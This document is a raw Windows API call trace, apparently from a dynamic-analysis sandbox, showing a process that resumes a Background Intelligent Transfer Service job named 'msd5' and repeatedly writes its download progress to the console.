[0076.494] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f128 | out: ppvObject=0x8f128*=0x0) returned 0x80004002
[0076.494] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f110 | out: ppvObject=0x8f110*=0x0) returned 0x80004002
[0076.494] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f0c4 | out: ppvObject=0x8f0c4*=0x240cb0) returned 0x0
[0076.494] IUnknown:AddRef (This=0x240cb0) returned 0x3
[0076.494] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f024 | out: ppvObject=0x8f024*=0x0) returned 0x80004002
[0076.494] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x240dc4 | out: ppvObject=0x240dc4*=0x0) returned 0x80004002
[0076.494] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x8f02c | out: ppvObject=0x8f02c*=0x0) returned 0x80004002
[0076.494] IUnknown:Release (This=0x240cb0) returned 0x2
[0076.497] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x231978*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x8e52c | out: ppvObject=0x8e52c*=0x0) returned 0x80004002
[0076.498] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x231978*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x8e52c | out: ppvObject=0x8e52c*=0x240cb0) returned 0x0
[0076.498] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x231978*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x238300 | out: ppvObject=0x238300*=0x240cb0) returned 0x0
[0076.500] IBackgroundCopyJob:Resume (This=0x22a624) returned 0x0
[0076.505] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0076.505] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0076.505] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x8f648 | out: lpMode=0x8f648) returned 1
[0076.509] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0076.509] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x8f688*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0076.509] PeekMessageW (in: lpMsg=0x8f660, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8f660) returned 1
[0076.509] TranslateMessage (lpMsg=0x8f660) returned 0
[0076.509] DispatchMessageW (lpMsg=0x8f660) returned 0x1
[0076.510] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x8f1bc | out: ppvObject=0x8f1bc*=0x0) returned 0x80004002
[0076.510] IBackgroundCopyCallback:JobModification (This=0x240cb0, pJob=0x22a6b4, dwReserved=0x0) returned 0x0
[0076.510] IBackgroundCopyJob:GetState (in: This=0x22a624, pVal=0x240cbc | out: pVal=0x240cbc) returned 0x0
[0076.510] IBackgroundCopyCallback:JobModification (This=0x240cb0, pJob=0x22a6b4, dwReserved=0x0) returned 0x0
[0076.510] IBackgroundCopyJob:GetState (in: This=0x22a624, pVal=0x240cbc | out: pVal=0x240cbc) returned 0x0
[0076.511] IBackgroundCopyJob:GetType (in: This=0x22a624, pVal=0x8dd20 | out: pVal=0x8dd20) returned 0x0
[0076.513] IBackgroundCopyJob:GetProgress (in: This=0x22a624, pVal=0x240cc0 | out: pVal=0x240cc0) returned 0x0
[0076.514] IBackgroundCopyJob:GetPriority (in: This=0x22a624, pVal=0x8dd1c | out: pVal=0x8dd1c) returned 0x0
[0076.515] CoTaskMemFree (pv=0x0)
[0076.515] IBackgroundCopyJob:GetDisplayName (in: This=0x22a624, pVal=0x8dd34 | out: pVal=0x8dd34*="msd5") returned 0x0
[0076.516] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcdc | out: lpConsoleScreenBufferInfo=0x8dcdc) returned 1
[0076.516] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x8dcf4 | out: lpNumberOfCharsWritten=0x8dcf4) returned 1
[0076.516] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x8dcf4 | out: lpNumberOfAttrsWritten=0x8dcf4) returned 1
[0076.517] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0076.517] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.517] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcc8 | out: lpConsoleScreenBufferInfo=0x8dcc8) returned 1
[0076.517] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8dce0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dce0*=0xa) returned 1
[0076.518] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.518] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcc4 | out: lpConsoleScreenBufferInfo=0x8dcc4) returned 1
[0076.518] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8dcdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dcdc*=0x5) returned 1
[0076.518] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.518] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dccc | out: lpConsoleScreenBufferInfo=0x8dccc) returned 1
[0076.519] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x8dce4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dce4*=0x7) returned 1
[0076.519] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.519] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcc0 | out: lpConsoleScreenBufferInfo=0x8dcc0) returned 1
[0076.519] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8dcd8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dcd8*=0x8) returned 1
[0076.519] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.519] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcc8 | out: lpConsoleScreenBufferInfo=0x8dcc8) returned 1
[0076.520] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8dce0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dce0*=0x8) returned 1
[0076.520] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.520] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcbc | out: lpConsoleScreenBufferInfo=0x8dcbc) returned 1
[0076.520] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x8dcd4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dcd4*=0xc) returned 1
[0076.520] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.521] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dccc | out: lpConsoleScreenBufferInfo=0x8dccc) returned 1
[0076.521] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8dce4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dce4*=0xa) returned 1
[0076.521] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.521] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcb4 | out: lpConsoleScreenBufferInfo=0x8dcb4) returned 1
[0076.522] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8dccc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dccc*=0xa) returned 1
[0076.522] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.522] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcbc | out: lpConsoleScreenBufferInfo=0x8dcbc) returned 1
[0076.522] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8dcd4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dcd4*=0x8) returned 1
[0076.522] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.523] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8dce0 | out: _Buffer="0") returned 1
[0076.523] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8dcec | out: _Buffer="1") returned 1
[0076.523] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcbc | out: lpConsoleScreenBufferInfo=0x8dcbc) returned 1
[0076.523] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8dcd4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dcd4*=0x5) returned 1
[0076.523] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.523] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dcc4 | out: lpConsoleScreenBufferInfo=0x8dcc4) returned 1
[0076.523] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8dcdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dcdc*=0x8) returned 1
[0076.524] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.524] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8dce8 | out: _Buffer="0") returned 1
[0076.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8dcdc | out: lpSystemTimeAsFileTime=0x8dcdc*(dwLowDateTime=0xde3819f0, dwHighDateTime=0x1d469c7))
[0076.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8dcd4 | out: lpSystemTimeAsFileTime=0x8dcd4*(dwLowDateTime=0xde3819f0, dwHighDateTime=0x1d469c7))
[0076.524] _finite (_X=0x0) returned 0
[0076.524] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc94 | out: lpConsoleScreenBufferInfo=0x8dc94) returned 1
[0076.524] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x8dcac, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dcac*=0xd) returned 1
[0076.524] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dca0 | out: lpConsoleScreenBufferInfo=0x8dca0) returned 1
[0076.525] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x8dcb8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dcb8*=0xf) returned 1
[0076.525] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.525] _vsnwprintf (in: _Buffer=0x8dacc, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x8da90 | out: _Buffer="0.00 B/S") returned 8
[0076.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dce4 | out: lpConsoleScreenBufferInfo=0x8dce4) returned 1
[0076.525] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8dcfc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dcfc*=0x8) returned 1
[0076.526] CoTaskMemFree (pv=0x238398)
[0076.526] IBackgroundCopyJob:GetType (in: This=0x22a624, pVal=0x8ed28 | out: pVal=0x8ed28) returned 0x0
[0076.527] IBackgroundCopyJob:GetProgress (in: This=0x22a624, pVal=0x240cc0 | out: pVal=0x240cc0) returned 0x0
[0076.527] IBackgroundCopyJob:GetPriority (in: This=0x22a624, pVal=0x8ed24 | out: pVal=0x8ed24) returned 0x0
[0076.528] CoTaskMemFree (pv=0x0)
[0076.528] IBackgroundCopyJob:GetDisplayName (in: This=0x22a624, pVal=0x8ed3c | out: pVal=0x8ed3c*="msd5") returned 0x0
[0076.529] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ece4 | out: lpConsoleScreenBufferInfo=0x8ece4) returned 1
[0076.529] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x8ecfc | out: lpNumberOfCharsWritten=0x8ecfc) returned 1
[0076.529] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x8ecfc | out: lpNumberOfAttrsWritten=0x8ecfc) returned 1
[0076.529] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0076.530] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd0 | out: lpConsoleScreenBufferInfo=0x8ecd0) returned 1
[0076.530] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8ece8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece8*=0xa) returned 1
[0076.530] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eccc | out: lpConsoleScreenBufferInfo=0x8eccc) returned 1
[0076.531] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8ece4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece4*=0x5) returned 1
[0076.531] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.531] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd4 | out: lpConsoleScreenBufferInfo=0x8ecd4) returned 1
[0076.531] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x8ecec, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecec*=0x7) returned 1
[0076.531] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.532] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc8 | out: lpConsoleScreenBufferInfo=0x8ecc8) returned 1
[0076.532] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ece0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece0*=0x8) returned 1
[0076.532] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.532] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd0 | out: lpConsoleScreenBufferInfo=0x8ecd0) returned 1
[0076.532] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ece8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece8*=0x8) returned 1
[0076.533] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.533] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc4 | out: lpConsoleScreenBufferInfo=0x8ecc4) returned 1
[0076.533] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x8ecdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecdc*=0xc) returned 1
[0076.533] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.533] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd4 | out: lpConsoleScreenBufferInfo=0x8ecd4) returned 1
[0076.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8ecec, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecec*=0xa) returned 1
[0076.534] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.534] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecbc | out: lpConsoleScreenBufferInfo=0x8ecbc) returned 1
[0076.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8ecd4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecd4*=0xa) returned 1
[0076.534] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.535] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc4 | out: lpConsoleScreenBufferInfo=0x8ecc4) returned 1
[0076.535] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ecdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecdc*=0x8) returned 1
[0076.535] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.535] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ece8 | out: _Buffer="0") returned 1
[0076.535] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf4 | out: _Buffer="1") returned 1
[0076.535] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc4 | out: lpConsoleScreenBufferInfo=0x8ecc4) returned 1
[0076.536] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8ecdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecdc*=0x5) returned 1
[0076.536] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.536] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eccc | out: lpConsoleScreenBufferInfo=0x8eccc) returned 1
[0076.536] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ece4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece4*=0x8) returned 1
[0076.536] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.537] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf0 | out: _Buffer="0") returned 1
[0076.537] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ecdc | out: lpSystemTimeAsFileTime=0x8ecdc*(dwLowDateTime=0xde3a7b50, dwHighDateTime=0x1d469c7))
[0076.537] _finite (_X=0x0) returned 1
[0076.537] _finite (_X=0x0) returned 1
[0076.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ec9c | out: lpConsoleScreenBufferInfo=0x8ec9c) returned 1
[0076.537] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x8ecb4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecb4*=0xd) returned 1
[0076.537] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eca8 | out: lpConsoleScreenBufferInfo=0x8eca8) returned 1
[0076.538] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x8ecc0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecc0*=0xf) returned 1
[0076.538] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.538] _vsnwprintf (in: _Buffer=0x8ead4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x8ea98 | out: _Buffer="0.00 B/S") returned 8
[0076.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecec | out: lpConsoleScreenBufferInfo=0x8ecec) returned 1
[0076.538] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ed04, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ed04*=0x8) returned 1
[0076.538] CoTaskMemFree (pv=0x238398)
[0076.539] PeekMessageW (in: lpMsg=0x8f660, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8f660) returned 0
[0076.539] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x8f688*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0076.703] PeekMessageW (in: lpMsg=0x8f660, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8f660) returned 1
[0076.703] TranslateMessage (lpMsg=0x8f660) returned 0
[0076.703] DispatchMessageW (lpMsg=0x8f660) returned 0x1
[0076.704] IBackgroundCopyCallback:JobModification (This=0x240cb0, pJob=0x22a6b4, dwReserved=0x0) returned 0x0
[0076.704] IBackgroundCopyJob:GetState (in: This=0x22a624, pVal=0x240cbc | out: pVal=0x240cbc) returned 0x0
[0076.718] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fbb
[0076.718] IBackgroundCopyJob:GetType (in: This=0x22a624, pVal=0x8ed28 | out: pVal=0x8ed28) returned 0x0
[0076.719] IBackgroundCopyCallback:JobModification (This=0x240cb0, pJob=0x22a6b4, dwReserved=0x0) returned 0x0
[0076.719] IBackgroundCopyJob:GetState (in: This=0x22a624, pVal=0x240cbc | out: pVal=0x240cbc) returned 0x0
[0076.720] IBackgroundCopyJob:GetProgress (in: This=0x22a624, pVal=0x240cc0 | out: pVal=0x240cc0) returned 0x0
[0076.721] IBackgroundCopyJob:GetPriority (in: This=0x22a624, pVal=0x8ed24 | out: pVal=0x8ed24) returned 0x0
[0076.722] CoTaskMemFree (pv=0x0)
[0076.722] IBackgroundCopyJob:GetDisplayName (in: This=0x22a624, pVal=0x8ed3c | out: pVal=0x8ed3c*="msd5") returned 0x0
[0076.722] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ece4 | out: lpConsoleScreenBufferInfo=0x8ece4) returned 1
[0076.722] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x8ecfc | out: lpNumberOfCharsWritten=0x8ecfc) returned 1
[0076.723] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x8ecfc | out: lpNumberOfAttrsWritten=0x8ecfc) returned 1
[0076.723] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0076.723] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.723] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd0 | out: lpConsoleScreenBufferInfo=0x8ecd0) returned 1
[0076.723] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8ece8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece8*=0xa) returned 1
[0076.724] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.724] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eccc | out: lpConsoleScreenBufferInfo=0x8eccc) returned 1
[0076.724] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8ece4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece4*=0x5) returned 1
[0076.724] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
